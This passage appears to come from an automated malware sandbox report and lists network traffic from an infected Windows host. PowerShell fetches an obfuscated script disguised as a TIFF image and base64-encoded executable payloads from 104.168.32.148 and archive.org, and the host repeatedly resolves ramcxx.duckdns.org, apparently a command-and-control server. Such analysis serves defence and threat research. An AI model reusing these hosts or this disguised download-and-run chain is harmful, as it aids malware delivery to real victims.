                                                Sep 25, 2024 18:54:05.043008089 CEST4972350312192.168.2.545.134.140.70
                                                Sep 25, 2024 18:54:05.049484015 CEST503124972345.134.140.70192.168.2.5

                                                UDP Packets

                                                TimestampSource PortDest PortSource IPDest IP
                                                Sep 25, 2024 18:50:12.195559978 CEST6464453192.168.2.51.1.1.1
                                                Sep 25, 2024 18:50:12.344655991 CEST53646441.1.1.1192.168.2.5
                                                Sep 25, 2024 18:50:20.021799088 CEST5340953192.168.2.51.1.1.1
                                                Sep 25, 2024 18:50:20.133908987 CEST53534091.1.1.1192.168.2.5
                                                Sep 25, 2024 18:50:32.386616945 CEST6450853192.168.2.51.1.1.1
                                                Sep 25, 2024 18:50:32.513113022 CEST53645081.1.1.1192.168.2.5
                                                Sep 25, 2024 18:51:27.347918034 CEST5887353192.168.2.51.1.1.1
                                                Sep 25, 2024 18:51:27.506309032 CEST53588731.1.1.1192.168.2.5
                                                Sep 25, 2024 18:52:34.745368958 CEST6281753192.168.2.51.1.1.1
                                                Sep 25, 2024 18:52:34.871671915 CEST53628171.1.1.1192.168.2.5
                                                Sep 25, 2024 18:53:42.245615005 CEST5185853192.168.2.51.1.1.1
                                                Sep 25, 2024 18:53:42.372384071 CEST53518581.1.1.1192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Sep 25, 2024 18:50:12.195559978 CEST192.168.2.51.1.1.10x3796Standard query (0)ia600100.us.archive.orgA (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:50:20.021799088 CEST192.168.2.51.1.1.10x1034Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:50:32.386616945 CEST192.168.2.51.1.1.10xf51fStandard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:51:27.347918034 CEST192.168.2.51.1.1.10x6a18Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:52:34.745368958 CEST192.168.2.51.1.1.10x74f5Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:53:42.245615005 CEST192.168.2.51.1.1.10xa625Standard query (0)ramcxx.duckdns.orgA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Sep 25, 2024 18:50:12.344655991 CEST1.1.1.1192.168.2.50x3796No error (0)ia600100.us.archive.org207.241.227.240A (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:50:20.133908987 CEST1.1.1.1192.168.2.50x1034No error (0)ramcxx.duckdns.org45.134.140.70A (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:50:32.513113022 CEST1.1.1.1192.168.2.50xf51fNo error (0)ramcxx.duckdns.org45.134.140.70A (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:51:27.506309032 CEST1.1.1.1192.168.2.50x6a18No error (0)ramcxx.duckdns.org45.134.140.70A (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:52:34.871671915 CEST1.1.1.1192.168.2.50x74f5No error (0)ramcxx.duckdns.org45.134.140.70A (IP address)IN (0x0001)false
                                                Sep 25, 2024 18:53:42.372384071 CEST1.1.1.1192.168.2.50xa625No error (0)ramcxx.duckdns.org45.134.140.70A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • ia600100.us.archive.org
                                                • 104.168.32.148

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549704104.168.32.148801600C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 25, 2024 18:50:06.117193937 CEST318OUTGET /345/nicemeetingsofpictureclearthingstobe.tIF HTTP/1.1
                                                Accept: */*
                                                Accept-Encoding: gzip, deflate
                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                Host: 104.168.32.148
                                                Connection: Keep-Alive
                                                Sep 25, 2024 18:50:06.613581896 CEST1236INHTTP/1.1 200 OK
                                                Date: Wed, 25 Sep 2024 16:50:06 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                Last-Modified: Wed, 25 Sep 2024 01:41:49 GMT
                                                ETag: "3f892-622e7b9c7d160"
                                                Accept-Ranges: bytes
                                                Content-Length: 260242
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: image/tiff
                                                Data Raw: ff fe 0d 00 0a 00 0d 00 0a 00 66 00 47 00 55 00 57 00 4c 00 61 00 43 00 6b 00 6b 00 52 00 6b 00 57 00 63 00 57 00 61 00 6c 00 4b 00 4a 00 7a 00 63 00 4b 00 4c 00 74 00 4c 00 7a 00 20 00 3d 00 20 00 22 00 64 00 54 00 62 00 41 00 70 00 55 00 4e 00 63 00 4b 00 41 00 70 00 53 00 4b 00 4c 00 66 00 55 00 48 00 7a 00 4b 00 62 00 66 00 63 00 6f 00 55 00 6c 00 22 00 0d 00 0a 00 4c 00 50 00 42 00 6e 00 63 00 4c 00 69 00 75 00 65 00 47 00 65 00 6b 00 71 00 54 00 63 00 61 00 6e 00 74 00 69 00 73 00 73 00 6f 00 63 00 69 00 61 00 6c 00 69 00 73 00 74 00 61 00 4c 00 50 00 70 00 4f 00 42 00 50 00 68 00 65 00 20 00 3d 00 20 00 22 00 4b 00 7a 00 6c 00 41 00 51 00 53 00 4b 00 71 00 5a 00 6d 00 65 00 4c 00 70 00 74 00 61 00 63 00 61 00 65 00 65 00 41 00 57 00 75 00 6f 00 6f 00 69 00 22 00 0d 00 0a 00 57 00 62 00 62 00 75 00 57 00 68 00 7a 00 55 00 63 00 4c 00 69 00 47 00 7a 00 76 00 51 00 70 00 50 00 47 00 4f 00 6f 00 4a 00 63 00 55 00 72 00 55 00 20 00 3d 00 20 00 22 00 4c 00 50 00 5a 00 4b 00 69 00 71 00 41 00 4c 00 [TRUNCATED]
                                                Data Ascii: fGUWLaCkkRkWcWalKJzcKLtLz = "dTbApUNcKApSKLfUHzKbfcoUl"LPBncLiueGekqTcantissocialistaLPpOBPhe = "KzlAQSKqZmeLptacaeeAWuooi"WbbuWhzUcLiGzvQpPGOoJcUrU = "LPZKiqALiZtPPUUOiihptRcdG"pvKZoJoHlmmKgpGHeGHZznKLi = "adlWvLPpjZRWekqUWeZaNGtAL"BiUzJLLJWbpCZLpiReHsbNWOZ = "RpaLkGNWQkWzLWWgWLpxudGLc"eGgzNtoiWuWfBkczcmuqZjHig = "QieLLApLLKWbKffRLLOZzBhWi"PWKccUmcmZjfudnecPUWWRvfL = "lUOPrGCviKNeifitWAItKZZkL"aSizWPOQjepqhhflZbGOscpAp = "LsPKGPNcTULGkik
                                                Sep 25, 2024 18:50:06.613610983 CEST1236INData Raw: 00 6d 00 71 00 66 00 6f 00 67 00 4c 00 6f 00 57 00 4c 00 4f 00 22 00 0d 00 0a 00 4c 00 62 00 6e 00 6d 00 49 00 67 00 4c 00 41 00 50 00 7a 00 4a 00 55 00 68 00 52 00 69 00 5a 00 76 00 4b 00 50 00 65 00 69 00 4e 00 69 00 4b 00 73 00 20 00 3d 00 20
                                                Data Ascii: mqfogLoWLO"LbnmIgLAPzJUhRiZvKPeiNiKs = "cccIBGTISvrxcWNCGiGiPLntk"TmlWalLWGWoxuKccUCWWxaAcm = "zTxPpqKLGcbOAzeZWGQaat
                                                Sep 25, 2024 18:50:06.613627911 CEST448INData Raw: 00 57 00 65 00 4c 00 6c 00 4b 00 51 00 65 00 66 00 4b 00 69 00 42 00 4f 00 65 00 57 00 55 00 61 00 57 00 66 00 20 00 3d 00 20 00 22 00 6f 00 67 00 51 00 47 00 6f 00 78 00 50 00 6c 00 78 00 69 00 63 00 43 00 51 00 55 00 57 00 4f 00 4b 00 4b 00 68
                                                Data Ascii: WeLlKQefKiBOeWUaWf = "ogQGoxPlxicCQUWOKKhcGCWAp"kBWLcLUOPezGcUjuhLOcbvcQL = "LKqWqLAWzUomxLWkkWLfLokLL"LeOGUnLGKABe
                                                Sep 25, 2024 18:50:06.613698959 CEST1236INData Raw: 00 73 00 47 00 64 00 4c 00 47 00 57 00 43 00 68 00 4b 00 47 00 6b 00 69 00 6d 00 4c 00 43 00 6b 00 47 00 65 00 7a 00 64 00 68 00 42 00 54 00 68 00 20 00 3d 00 20 00 22 00 41 00 66 00 74 00 4c 00 76 00 4f 00 41 00 69 00 4b 00 41 00 6d 00 43 00 72
                                                Data Ascii: sGdLGWChKGkimLCkGezdhBTh = "AftLvOAiKAmCricLNpWpZUufi"UKpgLzWbGibRWAbqibCBhantissocialistaOL = "CReNPiqiQAuvWpUoCvccKNd
                                                Sep 25, 2024 18:50:06.613713980 CEST1236INData Raw: 00 50 00 66 00 57 00 47 00 4f 00 57 00 6c 00 4b 00 65 00 63 00 50 00 50 00 4b 00 76 00 47 00 6d 00 74 00 55 00 69 00 55 00 22 00 0d 00 0a 00 7a 00 4c 00 57 00 51 00 52 00 61 00 6e 00 74 00 69 00 73 00 73 00 6f 00 63 00 69 00 61 00 6c 00 69 00 73
                                                Data Ascii: PfWGOWlKecPPKvGmtUiU"zLWQRantissocialistaTRLpkbUKLLRoUAJPsp = "QxeZUBicGnLkiaPpCLuLPcltt"PbLgZJcLLiWBhdehKUdKelLph =
                                                Sep 25, 2024 18:50:06.613732100 CEST1236INData Raw: 00 69 00 73 00 73 00 6f 00 63 00 69 00 61 00 6c 00 69 00 73 00 74 00 61 00 69 00 22 00 0d 00 0a 00 53 00 74 00 6f 00 57 00 4c 00 63 00 55 00 65 00 62 00 53 00 6f 00 47 00 75 00 50 00 69 00 50 00 52 00 57 00 6d 00 50 00 57 00 4a 00 47 00 57 00 71
                                                Data Ascii: issocialistai"StoWLcUebSoGuPiPRWmPWJGWq = "oGhUGqsLaiGeOLcfhkWiPmzbc"iKsOveGdOmtqoLIAbcnLkibnf = "GnqniLcdKkOnefGincC
                                                Sep 25, 2024 18:50:06.613748074 CEST1236INData Raw: 00 51 00 4e 00 43 00 4c 00 47 00 74 00 57 00 70 00 4b 00 41 00 47 00 61 00 70 00 75 00 55 00 6e 00 65 00 50 00 41 00 6c 00 69 00 6c 00 6b 00 68 00 22 00 0d 00 0a 00 4e 00 61 00 49 00 6a 00 47 00 78 00 64 00 4b 00 41 00 47 00 52 00 54 00 69 00 70
                                                Data Ascii: QNCLGtWpKAGapuUnePAlilkh"NaIjGxdKAGRTipIuWkHmfGqqe = "oJWGUIaJGBcNBBQoAuZWNGmte"cUaAcnGLiWZkKAKndHbtnLWLA = "PsWetNcf
                                                Sep 25, 2024 18:50:06.613765001 CEST328INData Raw: 00 78 00 73 00 71 00 66 00 4c 00 4c 00 20 00 3d 00 20 00 22 00 47 00 68 00 63 00 75 00 50 00 4c 00 62 00 7a 00 6d 00 62 00 4b 00 4e 00 6f 00 4c 00 64 00 74 00 69 00 63 00 69 00 42 00 4c 00 6a 00 4c 00 62 00 47 00 22 00 0d 00 0a 00 6b 00 4a 00 57
                                                Data Ascii: xsqfLL = "GhcuPLbzmbKNoLdticiBLjLbG"kJWTGlhGoILkBHUoiPfBGicxW = "koeLiLhLBtGAWCfkubJKNxuAL"tGOZLioNpOzdKKNGGfKLOWiiL
                                                Sep 25, 2024 18:50:06.613779068 CEST1236INData Raw: 00 4c 00 6e 00 57 00 6b 00 70 00 74 00 4e 00 73 00 4e 00 42 00 6d 00 6f 00 69 00 20 00 3d 00 20 00 22 00 47 00 63 00 4c 00 64 00 42 00 4c 00 66 00 69 00 69 00 4c 00 75 00 6d 00 65 00 6b 00 63 00 62 00 6f 00 69 00 63 00 66 00 4c 00 52 00 6b 00 50
                                                Data Ascii: LnWkptNsNBmoi = "GcLdBLfiiLumekcboicfLRkPi"kjtNpoazZcxfeahWWcAKkfeHA = "ikACoWPbfLbixQZWIlaPUWzka"bqcLPcPzcAkztGZouKf
                                                Sep 25, 2024 18:50:06.613794088 CEST1236INData Raw: 00 76 00 66 00 4e 00 5a 00 4f 00 72 00 4e 00 55 00 47 00 4f 00 6e 00 4b 00 64 00 43 00 43 00 4b 00 61 00 69 00 6d 00 50 00 5a 00 42 00 22 00 0d 00 0a 00 70 00 50 00 64 00 63 00 68 00 71 00 6b 00 4b 00 55 00 4e 00 57 00 75 00 69 00 57 00 6d 00 4c
                                                Data Ascii: vfNZOrNUGOnKdCCKaimPZB"pPdchqkKUNWuiWmLWkbGQLPUz = "pKeokUoeqTApeLsttZNSNWUWU"LpGcLJlLxPWGzKLCAAKbAcLpm = "qzOUzBetot
                                                Sep 25, 2024 18:50:06.618721962 CEST1236INData Raw: 00 50 00 53 00 52 00 67 00 6f 00 57 00 47 00 63 00 42 00 61 00 57 00 62 00 5a 00 57 00 57 00 20 00 3d 00 20 00 22 00 63 00 57 00 69 00 78 00 4c 00 53 00 69 00 65 00 57 00 66 00 70 00 4b 00 68 00 50 00 64 00 43 00 6c 00 43 00 4c 00 52 00 54 00 4f
                                                Data Ascii: PSRgoWGcBaWbZWW = "cWixLSieWfpKhPdClCLRTOkIi"RgrLSKfmLLtZZKnlnLabLpJLZ = "kRvubNKdAaeaziWqWNixfelGI"uWxjgWhZUWAKhck


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.549708104.168.32.148801672C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                Sep 25, 2024 18:50:18.633836031 CEST78OUTGET /345/CHPPZA.txt HTTP/1.1
                                                Host: 104.168.32.148
                                                Connection: Keep-Alive
                                                Sep 25, 2024 18:50:19.113245964 CEST1236INHTTP/1.1 200 OK
                                                Date: Wed, 25 Sep 2024 16:50:19 GMT
                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.1.25
                                                Last-Modified: Wed, 25 Sep 2024 01:38:21 GMT
                                                ETag: "a1000-622e7ad53cccd"
                                                Accept-Ranges: bytes
                                                Content-Length: 659456
                                                Keep-Alive: timeout=5, max=100
                                                Connection: Keep-Alive
                                                Content-Type: text/plain
                                                Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 77 44 71 38 67 49 50 73 78 44 54 38 77 43 50 49 73 44 2f 37 77 39 4f 77 75 44 6c 37 51 33 4f 55 74 44 4d 37 41 68 4f 73 72 44 7a 36 77 71 4f 4d 71 44 62 36 51 6b 4f 6f 6f 44 45 36 67 67 4f 45 6f 44 41 35 77 66 4f 34 6e 44 39 35 41 36 4d 30 4d 44 4d 79 51 71 4d 67 4b 44 68 79 41 6f 4d 38 4a 44 63 79 67 6c 4d 49 4a 44 4f 79 67 69 4d 59 45 44 36 78 67 64 4d 55 48 44 30 78 77 63 4d 49 48 44 78 78 41 63 4d 38 47 44 75 78 77 61 4d 6f 47 44 70 78 41 61 4d 63 47 44 6d 78 51 5a 4d 51 47 44 6a 78 67 59 4d 34 46 44 64 78 41 48 41 41 41 41 6a 41 63 41 45 41 34 44 74 2b 41 71 50 59 36 44 68 2b 77 6e 50 30 35 44 62 2b 67 6d 50 67 35 44 54 2b 51 6b 50 77 34 44 4b 2b 41 69 50 59 34 44 46 2b 41 68 50 4d 34 44 43 2b 41 51 50 38 33 44 39 39 41 65 50 59 33 44 78 39 77 62 50 30 32 44 72 39 67 [TRUNCATED]
                                                Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwDq8gIPsxDT8wCPIsD/7w9OwuDl7Q3OUtDM7AhOsrDz6wqOMqDb6QkOooDE6ggOEoDA5wfO4nD95A6M0MDMyQqMgKDhyAoM8JDcyglMIJDOygiMYED6xgdMUHD0xwcMIHDxxAcM8GDuxwaMoGDpxAaMcGDmxQZMQGDjxgYM4FDdxAHAAAAjAcAEA4Dt+AqPY6Dh+wnP05Db+gmPg5DT+QkPw4DK+AiPY4DF+AhPM4DC+AQP83D99AePY3Dx9wbP02Dr9gYPA2De9QXPY1DO9QTPYwD+8gNP4yDm8gHPYxDO8gxO4vD27g7OYuDe7g1O4sDG6gvOYrDu6gpO4pDW6gjO0oDG5gfOYnDu5gZO8lDe5AXOQlDM5ABOwjD04ALOQiDc4AFOwgDF4gwNofDy3g6NIeDa3g0NocDC2QvNsbD62AuNYbD02wsNgaDm2woNoZDW2QlN4YDN2whNYYDE1QfNwXD61AZNEWDZ1gVNQVDP1QTNwUDL1QSNcUDF1AAN4TD90APNoTD40gNNETDv0gKNgSDn0gJNQSDi0AINsRDZ0AGNYRDU0gENERDK0QCNMMD/zg8MAPDtzQ6MwNDazw1MMNDGzAxMEID9yAsM4KDrywpMoJDYyQlMEJDEygQM8HD7xgbMwGDpxQZMgFDWxwUM8EDCxAAM0DD7wQOMwCDqwwJMUCDjwgFMQBDRwwDM0ADAAAQAQCgBgDwP4/D7/w9Po+Do/Q5PE+DU/g0P88DL/wxPI4Dx+wrPw6Do+ApP85DO+AjPk4DF9AePYnDi5AXOolDZ5AWOQlDT5wTOkkDH5gROUkDE5wQOIgD+4QPOkjDz4QMOAjDv4
                                                Sep 25, 2024 18:50:19.113270998 CEST1236INData Raw: 67 4c 4f 30 69 44 73 34 41 4b 4f 63 69 44 6a 34 51 48 4f 73 68 44 61 34 51 47 4f 67 68 44 58 34 77 45 4f 49 68 44 4f 34 41 43 4f 59 67 44 46 34 41 42 4f 4d 67 44 43 33 67 2f 4e 30 66 44 35 33 77 38 4e 45 66 44 77 33 77 37 4e 73 65 44 71 33 67 35
                                                Data Ascii: gLO0iDs4AKOciDj4QHOshDa4QGOghDX4wEOIhDO4ACOYgDF4ABOMgDC3g/N0fD53w8NEfDw3w7NseDq3g5NUeDh3w2NkdDY3A1N4cDM3wyNocDJ3QhN8bD+2AuNYbD12AtNMbDy2grN0aDp2woNEaDg2AnNsZDX2QkN8YDO2QjNkYDI2ARN4XD81weNoXD51QdNQXDw1gaNgWDn1gZNUWDh1AYNwVDW1AVNMVDS1gTN0UDJ1wQN
                                                Sep 25, 2024 18:50:19.113285065 CEST1236INData Raw: 78 44 58 38 51 46 50 4d 78 44 52 38 77 44 50 30 77 44 4c 38 51 43 50 63 77 44 46 38 77 41 50 45 73 44 2f 37 51 2f 4f 73 76 44 35 37 77 39 4f 55 76 44 7a 37 51 38 4f 38 75 44 74 37 77 36 4f 6b 75 44 6e 37 51 35 4f 4d 75 44 68 37 77 33 4f 30 74 44
                                                Data Ascii: xDX8QFPMxDR8wDP0wDL8QCPcwDF8wAPEsD/7Q/OsvD57w9OUvDz7Q8O8uDt7w6OkuDn7Q5OMuDh7w3O0tDb7Q2OctDV7w0OEtDP7QzOssDJ7wxOUsDD7QgO8rD96wuOkrD36QtOMrDx6wrO0qDr6QqOcqDl6woOEqDf6QnOspDZ6wlOUpDT6QkO8oDN6wiOkoDH6QhOMoDB5wfO0nD75QeOcnD15wcOEnDv5QbOsmDp5wZOUmDj
                                                Sep 25, 2024 18:50:19.113296986 CEST1236INData Raw: 77 78 4f 59 41 41 41 41 41 4f 41 46 41 4f 41 41 41 41 4e 6b 53 44 6f 30 77 4a 4e 59 53 44 6c 30 41 4a 4e 4d 53 44 69 30 51 49 4e 41 53 44 66 30 67 48 4e 30 52 44 63 30 77 47 4e 6f 52 44 59 30 77 46 4e 59 52 44 56 30 41 46 4e 4d 52 44 52 30 67 44
                                                Data Ascii: wxOYAAAAAOAFAOAAAANkSDo0wJNYSDl0AJNMSDi0QINASDf0gHN0RDc0wGNoRDY0wFNYRDV0AFNMRDR0gDN0QDM0wCNoQDJ0ACNcQDF0ABNMQDC0QANAMD/zg/MwPD6AAAAcBQBQDgO8rD+6QvOwrD76guOkrD46wtOYrD16AtOMrDy6QsOArDv6grO0qDs6wqOoqDp6AqOcqDm6QpOQqDj6goOEqDg6wnO4pDd6AnOspDa6QmO
                                                Sep 25, 2024 18:50:19.113311052 CEST1236INData Raw: 79 44 6e 38 51 4a 50 4d 79 44 68 38 77 48 50 30 78 44 62 38 51 47 50 63 78 44 56 38 77 45 50 45 78 44 50 38 51 44 50 73 77 44 4a 38 77 42 50 55 77 44 44 38 51 77 4f 38 76 44 39 37 77 2b 4f 6b 76 44 33 37 51 39 4f 4d 76 44 78 37 77 37 4f 30 75 44
                                                Data Ascii: yDn8QJPMyDh8wHP0xDb8QGPcxDV8wEPExDP8QDPswDJ8wBPUwDD8QwO8vD97w+OkvD37Q9OMvDx7w7O0uDr7Q6OcuDl7w4OEuDf7Q3OstDZ7w1OUtDT7Q0O8sDN7wyOksDH7QxOMsDB6wvO0rD76QuOcrD16wsOErDv6QrOsqDp6wpOUqDj6QoO8pDd6wmOkpDX6QlOMpDR6wjO0oDL6QiOcoDF6wgOEkD/5QfOsnD55wdOUnDz
                                                Sep 25, 2024 18:50:19.113322020 CEST1236INData Raw: 6f 2f 50 77 2f 6a 35 2f 77 39 50 53 2f 44 79 2f 34 37 50 79 2b 7a 70 2f 30 35 50 54 2b 54 69 2f 38 33 50 6b 39 54 53 2f 59 79 50 44 34 44 36 2b 34 74 50 55 37 6a 79 2b 41 73 50 32 36 44 72 2b 49 71 50 59 36 6a 6a 2b 51 6f 50 36 35 44 63 2b 59 6d
                                                Data Ascii: o/Pw/j5/w9PS/Dy/47Py+zp/05PT+Ti/83Pk9TS/YyPD4D6+4tPU7jy+AsP26Dr+IqPY6jj+QoP65Dc+YmPc5jU+gkP+4TN+4gPG0z79scPP2TU9QBPYzTy8oLPHyzf7s7Ozuzq7M2O+sDH6cvOorT26QBOGjjH4IwN+dTYzU5MPOzez01MLNjRxceMzGjgxwXMVAjKwsBMPAAAAQKAFAHAAAwP//j4/o9Pw+Ta/k0P98TM/0xP
                                                Sep 25, 2024 18:50:19.113336086 CEST776INData Raw: 35 44 55 2b 67 52 50 41 33 44 73 39 59 61 50 5a 32 7a 6a 39 41 59 50 6d 31 7a 58 39 67 56 50 52 31 6a 48 39 6b 51 50 45 77 7a 38 38 6b 4f 50 4c 7a 7a 72 38 30 4a 50 4c 79 44 66 38 49 67 4f 35 72 6a 30 36 63 6d 4f 41 6c 7a 6d 32 49 74 4e 7a 61 54
                                                Data Ascii: 5DU+gRPA3Ds9YaPZ2zj9AYPm1zX9gVPR1jH9kQPEwz88kOPLzzr80JPLyDf8IgO5rj06cmOAlzm2ItNzaTR1oeNJSTv0ALNoSzezU0MCIT4yktMBLTrxAeMxGTQwYPMuDjcwsGMrAAAAAHAEAOAAAwPM/zn/w1PR9DS/QiP+7j9+cpPP6zX+4UPh2DN9QBPlzT38UMP5yjc84FPksDw7U3OstzY700OBtzI7sxOQszB6EvObrDo
                                                Sep 25, 2024 18:50:19.113351107 CEST1236INData Raw: 41 41 42 67 43 77 50 74 2b 54 6b 2b 51 6e 50 2b 30 7a 6b 39 4d 59 50 70 30 6a 42 38 41 4e 50 2b 79 7a 68 38 77 45 50 78 77 54 41 37 67 38 4f 54 74 54 52 37 41 30 4f 7a 73 54 48 37 63 77 4f 41 6f 7a 33 35 38 2b 4e 7a 66 7a 49 33 51 67 4e 69 62 44
                                                Data Ascii: AABgCwPt+Tk+QnP+0zk9MYPp0jB8ANP+yzh8wEPxwTA7g8OTtTR7A0OzsTH7cwOAoz358+NzfzI3QgNibDd2IlNCZTL2MSNCWTb1QWNXVDT0YPNuTTy0EMNTSDj0sHNxRzZ0AGNRRzS0QEN5ITvyIrMSFj+xQfMuHz2x0cMFHjrxQaMZGzkx4YMpFDYxwTM0AT9w0OMsCTow4EMIBAAAAKAEAJA/E+PZ/zy/M8P6+Ts/k6Ph+Tm
                                                Sep 25, 2024 18:50:19.113431931 CEST1236INData Raw: 42 41 41 41 38 7a 34 2f 55 32 50 4f 35 44 75 2b 34 6d 50 57 35 7a 42 39 77 66 50 6a 32 6a 67 38 73 4e 50 4b 79 6a 64 38 73 47 50 67 78 7a 57 38 45 46 50 4d 78 6a 4d 38 63 78 4f 71 76 6a 30 37 6f 35 4f 30 74 7a 56 37 45 69 4f 33 72 44 32 34 6f 4c
                                                Data Ascii: BAAA8z4/U2PO5Du+4mPW5zB9wfPj2jg8sNPKyjd8sGPgxzW8EFPMxjM8cxOqvj07o5O0tzV7EiO3rD24oLO1izh4YGOhhjL4cCOIcj/3g/NZfzz1sdNQXzl14YNjUTH1cRNNQTu0UKNfSTj00ENyQDI08ANGMD/zQ/MiPjmzE5M/NDez4gM9LD+ywuMnLD1ygsMBLjqyQpM+Jzby8jMjIDExkeMTDznw4GMjBDSwQCMIAAAAgLA
                                                Sep 25, 2024 18:50:19.115319014 CEST1236INData Raw: 66 6a 34 33 34 39 4e 61 66 6a 31 33 49 39 4e 4f 66 6a 79 33 59 38 4e 43 66 6a 76 33 6f 37 4e 32 65 6a 73 33 34 36 4e 71 65 6a 70 33 49 36 4e 65 65 6a 6d 33 59 35 4e 53 65 6a 6a 33 6f 34 4e 47 65 6a 67 33 34 33 4e 36 64 6a 64 33 49 33 4e 75 64 6a
                                                Data Ascii: fj4349Nafj13I9NOfjy3Y8NCfjv3o7N2ejs346Nqejp3I6Neejm3Y5NSejj3o4NGejg343N6djd3I3NudjaAAAAgCwAACAAAUjYAAAAMAwAwBwPQ/DW/UEPsyDq8QKPgyzm8YFPAsD/7g/O0vz77g+OxqzA5UfOXnDx3wyNocDJ3AyNbYj12AoN8ZDe2QnNvZDa2EDNDSTd0cFNENDlzE1MLNzOzIhMpLzwyEqMbKTjygoMCKDf
                                                Sep 25, 2024 18:50:19.118315935 CEST1236INData Raw: 51 70 4e 42 61 6a 4d 32 59 51 4e 6f 57 54 6c 31 6b 55 4e 44 56 6a 49 31 30 52 4e 54 55 44 43 30 34 50 4e 30 54 6a 37 30 67 4f 4e 69 54 44 33 30 6f 4d 4e 41 54 44 75 30 30 4b 4e 6e 53 54 6f 30 6f 49 4e 43 53 54 52 30 30 44 4e 76 51 54 4a 30 59 42
                                                Data Ascii: QpNBajM2YQNoWTl1kUNDVjI10RNTUDC04PN0Tj70gONiTD30oMNATDu00KNnSTo0oINCSTR00DNvQTJ0YBNLQjB0AwMnPj3zk9MKPjvzs6MjOzjzY4MBODezM3MsNTXzc1MKJDdyomMgJjVywkMGBAABQBADAEA/whP11j29kDPmyzE7AoOvnDB4IPOcjTp4cIOshDS4EDOUgDDAAAAsAwAwAwPA+za/YlP+TjNzcOAAAAFAMAI


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.549705207.241.227.2404431672C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-25 16:50:12 UTC109OUTGET /24/items/detah-note-v/DetahNoteV.txt HTTP/1.1
                                                Host: ia600100.us.archive.org
                                                Connection: Keep-Alive
                                                2024-09-25 16:50:13 UTC606INHTTP/1.1 200 OK
                                                Server: nginx/1.24.0 (Ubuntu)
                                                Date: Wed, 25 Sep 2024 16:50:13 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Content-Length: 2823512
                                                Last-Modified: Wed, 11 Sep 2024 23:50:18 GMT
                                                Connection: close
                                                ETag: "66e22cba-2b1558"
                                                Strict-Transport-Security: max-age=15724800
                                                Expires: Wed, 25 Sep 2024 22:50:13 GMT
                                                Cache-Control: max-age=21600
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                Access-Control-Allow-Credentials: true
                                                Accept-Ranges: bytes
                                                2024-09-25 16:50:13 UTC15778INData Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 42 6f 43 42 62 6f 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 59 67 41 41 41 49 41 41 41 41 41 41 41 41 76 6d 55 67 41 41 41 67 41 41 41 41 67 43 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41
                                                Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDABoCBboAAAAAAAAAAOAADiELATAAAEYgAAAIAAAAAAAAvmUgAAAgAAAAgCAAAABAAAAgAAAAAgA
